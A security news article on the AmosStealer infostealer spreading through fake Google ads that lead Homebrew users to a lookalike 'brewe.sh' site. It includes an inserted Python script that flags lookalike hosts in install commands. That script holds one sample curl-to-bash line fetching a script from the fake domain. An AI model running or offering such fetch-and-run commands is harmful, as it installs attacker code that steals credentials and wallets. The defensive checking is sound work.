AmosStealer malware infects targets via fake Google adverts

February 14, 2025
Tags: AmosStealer, Malware, Google Advertisement, Infostealer

Hackers are once again using Google advertising to spread the AmosStealer malware. Reports revealed that this new attack could compromise macOS and Linux devices with an infostealer that harvests credentials, browser data, and cryptocurrency wallets.

Moreover, the malware in this operation is offered as Malware-as-a-Service: cybercriminals can rent it for a monthly subscription of $1,000.

Researchers have observed the new strain in various malvertising campaigns promoting bogus Google Meet conferencing pages. This prevalence has made it one of the most sought-after infostealers among cybercriminals who target Apple devices.

Homebrew users are the target of the new AmosStealer malware.

The AmosStealer operators may have prioritised Homebrew users who own Apple products because Homebrew is a popular open-source package manager for macOS and Linux that lets an individual install, update, and manage software from the command line.

Investigations show that fraudulent Google advertising featured the correct Homebrew URL, “brew.sh,” deceiving even some of the most experienced users into clicking it. However, this link would redirect the users to a phoney Homebrew site stored at “brewe.sh”.

Malvertising campaigns have extensively exploited this URL strategy to fool users into visiting what appears to be an authentic website for a project or firm.

Once the visitor arrives at the site, the malware operation may instruct them to install Homebrew by copying a command and pasting it into the macOS Terminal or a Linux shell prompt. However, running the command displayed on the bogus website downloads and executes malware on the device.

Reports revealed that the malware injected in this instance is a potent infostealer that targets over 50 cryptocurrency extensions, desktop wallets, and online browser data.
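The lookalike-domain trick described above ("brew.sh" versus "brewe.sh") is easy to miss by eye but simple to check mechanically. As an added example, not code from the article or from the Homebrew project, the Python script below extracts every host referenced by a copy-paste install command and flags any host that is not on an allowlist, distinguishing near-miss spellings from trusted names buried inside an untrusted hostname. The allowlist is an assumption for illustration (brew.sh is the official site named in the article; the GitHub hosts are where the author of this example believes the official installer script is served from), and both sample commands are constructed.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Hosts a genuine Homebrew install command is expected to reference.
# "brew.sh" is the official site named in the article; the GitHub entries are
# an assumption about where the official installer script is served from.
ALLOWED_HOSTS = {"brew.sh", "raw.githubusercontent.com", "github.com"}

# Matches http(s) URLs embedded in shell text; stops at whitespace, quotes and brackets.
URL_RE = re.compile(r"https?://[^\s\"'()<>]+")


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (classic dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def hosts_in_command(cmd: str) -> List[str]:
    """Return the hostname of every URL found in a shell command string."""
    return [urlparse(u).hostname or "" for u in URL_RE.findall(cmd)]


def classify_host(host: str, allowed=ALLOWED_HOSTS, max_distance: int = 2) -> Optional[str]:
    """Return None if the host is trusted, otherwise a short reason it looks suspicious."""
    host = host.lower()
    if host in allowed or any(host.endswith("." + a) for a in allowed):
        return None  # exact match or a genuine subdomain of a trusted host
    # "brew.sh.example.test" style: a trusted name buried inside an untrusted host
    embedded = [a for a in allowed if a in host]
    if embedded:
        return f"embeds trusted name {embedded[0]} inside an untrusted host"
    # "brewe.sh" style: only a character or two away from a trusted name
    nearest = min(allowed, key=lambda a: levenshtein(host, a))
    if levenshtein(host, nearest) <= max_distance:
        return f"lookalike of {nearest}"
    return "not on allowlist"


def check_command(cmd: str, allowed=ALLOWED_HOSTS) -> List[Tuple[str, str]]:
    """Flag every host in cmd that is not trusted; an empty list means all hosts are trusted."""
    findings = []
    for host in hosts_in_command(cmd):
        reason = classify_host(host, allowed)
        if reason:
            findings.append((host, reason))
    return findings


# Constructed samples: a command of the kind the article's bogus site might ask a
# visitor to paste, versus one referencing only trusted hosts (the second mirrors
# what the author of this example believes the official installer command looks like).
FAKE_CMD = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'
REAL_CMD = ('/bin/bash -c "$(curl -fsSL '
            'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"')

if __name__ == "__main__":
    for label, cmd in (("fake", FAKE_CMD), ("real", REAL_CMD)):
        print(label, check_command(cmd) or "OK")
```

The allowlist is deliberately the only source of truth: a host that merely contains a trusted name, or sits one edit away from it, is reported rather than silently accepted, which is exactly the gap a registered lookalike such as "brewe.sh" exploits. The same check can be run over the URL shown in a sponsored search result before the page is ever opened.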

One of Homebrew’s project leaders said the project was aware of the situation but that it was beyond its control, and blamed Google for the lack of oversight of its advertising.

The malicious ad has been removed, but the campaign could still run through other redirection domains; hence, Homebrew users should be wary of sponsored advertisements for the project.

Fraudulent advertising continues to appear in Google Search results for a wide range of queries, including searches for Google advertising itself, exposing more users to possible exploits and malware infections.
